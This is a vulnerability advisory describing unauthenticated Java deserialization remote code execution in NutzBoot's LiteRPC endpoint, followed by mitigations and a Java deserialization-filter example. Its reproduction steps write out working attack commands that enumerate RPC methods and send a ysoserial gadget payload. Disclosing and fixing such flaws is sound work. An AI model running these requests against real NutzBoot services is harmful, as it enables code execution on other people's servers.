### Key Information Extraction

#### Affected Products

- NutzBoot (LiteRPC + Loach modules)

#### Version Information

- **Affected Versions**: 2.6.0-SNAPSHOT (current dev branch; check the specific commits manually). Earlier versions that exposed the LiteRPC HTTP endpoint may also be affected. No fixed version has been released yet.
- **Vendor Website**: [Nutz Framework](https://nutzam.com)

#### Vulnerability Type

- Unauthenticated Java deserialization leading to Remote Code Execution (RCE)

#### Vulnerability Cause

1. `HttpServletRpcEndpoint` unconditionally accepts serialized data from the client and invokes `readObject()` on it directly.
2. `LoachClient` unconditionally publishes all RPC registration information, so method signatures can be discovered via `/loach/v1/list`.

#### Impact

- An unauthenticated attacker can send serialized data that triggers arbitrary code execution with the privileges of the NutzBoot service process.

#### Vulnerability Description

- Unauthenticated access to `/literpc/endpoint` allows Java deserialization. The default configuration applies no deserialization filtering; an attacker can enumerate the RPC methods and use a suitable gadget chain to trigger the attack.

#### Vulnerability Location

- The `/literpc/endpoint` URL is handled by `HttpServletRpcEndpoint`.

#### Vulnerability Reproduction Steps

1. Retrieve the RPC service metadata:

   ```bash
   curl http:///loach/v1/list | jq '.data | keys'
   ```

2. Generate a malicious serialized payload:

   ```bash
   ysoserial CommonsCollections6 calc > payload.bin
   ```

3. Send the payload to `/literpc/endpoint`:

   ```bash
   curl -X POST http:///literpc/endpoint \
     -H 'LiteRpc-Klass: io.nutz.cloud.demo.service.UserService' \
     -H 'LiteRpc-Method: add:7e18b2f3' \
     -H 'LiteRpc-Serializer: jdk' \
     --data-binary @payload.bin
   ```

#### Mitigation Recommendations

1. Disable or remove JDK serialization and switch to a safer format (e.g., JSON or Kryo) for data transmission.
2. Require the client to specify the serialization method through a parameter rather than a request header.
3. Implement authentication and authorization checks for `/literpc/endpoint`.
4. Restrict access to service-listing APIs such as `/loach/v1/list`.
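One way to apply mitigations 1 and 3 before `HttpServletRpcEndpoint` ever reaches `readObject()`, as an added example rather than NutzBoot's own code: a JEP 290 `ObjectInputFilter` allow-list (Java 9+) combined with a constant-time token check. `RpcRequestGuard`, the `LiteRpc-Token` header, the shared secret and the allow-listed packages are assumptions; the `main` feeds the filter a constructed argument array and a constructed object outside the list to show one accepted and the other refused before it is instantiated.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

/** Hypothetical guard for use before HttpServletRpcEndpoint reaches readObject(); not NutzBoot code. */
public final class RpcRequestGuard {
    // JEP 290 allow-list: the RPC DTO package plus a few JDK packages. "!*" rejects every other
    // class, including gadget-chain classes, before the JVM instantiates it. The limits cap the
    // nesting depth, reference count and stream size an untrusted caller can force.
    static final ObjectInputFilter ARG_FILTER = ObjectInputFilter.Config.createFilter(
        "io.nutz.cloud.demo.service.**;java.lang.*;java.util.*;!*;maxdepth=16;maxrefs=256;maxbytes=65536");

    /** Mitigation 3: compare the presented token (assumed header LiteRpc-Token) to a per-deployment secret. */
    static boolean isAuthorized(String presentedToken, byte[] expectedToken) {
        if (presentedToken == null) return false;
        // MessageDigest.isEqual is constant-time, so the comparison does not leak the secret's prefix.
        return MessageDigest.isEqual(presentedToken.getBytes(StandardCharsets.UTF_8), expectedToken);
    }

    /** Defence in depth for deployments that must keep the "jdk" serializer: install the filter, then read. */
    static Object readFiltered(InputStream body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(body)) {
            ois.setObjectInputFilter(ARG_FILTER);   // must be installed before the first readObject()
            return ois.readObject();                // a disallowed class raises InvalidClassException
        }
    }

    private static InputStream serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return new ByteArrayInputStream(bos.toByteArray());
    }

    public static void main(String[] args) throws Exception {
        byte[] secret = "constructed-demo-secret".getBytes(StandardCharsets.UTF_8);
        System.out.println("auth ok:      " + isAuthorized("constructed-demo-secret", secret));
        System.out.println("auth missing: " + isAuthorized(null, secret));
        // Constructed argument array of allow-listed types, as a legitimate call would send.
        Object[] legit = (Object[]) readFiltered(serialize(new String[] {"alice", "alice@example.invalid"}));
        System.out.println("legit args:   " + legit.length);
        // Constructed object outside the allow-list (java.util.concurrent.atomic is not java.util.*):
        // the filter refuses it before any constructor or readObject hook of that class runs.
        try {
            readFiltered(serialize(new java.util.concurrent.atomic.AtomicInteger(1)));
        } catch (InvalidClassException e) {
            System.out.println("rejected:     " + e.getMessage());
        }
    }
}
```

The same `ARG_FILTER` can be installed process-wide with `ObjectInputFilter.Config.setSerialFilter` (or the `jdk.serialFilter` system property) so that every `ObjectInputStream` in the service is covered, not only this endpoint.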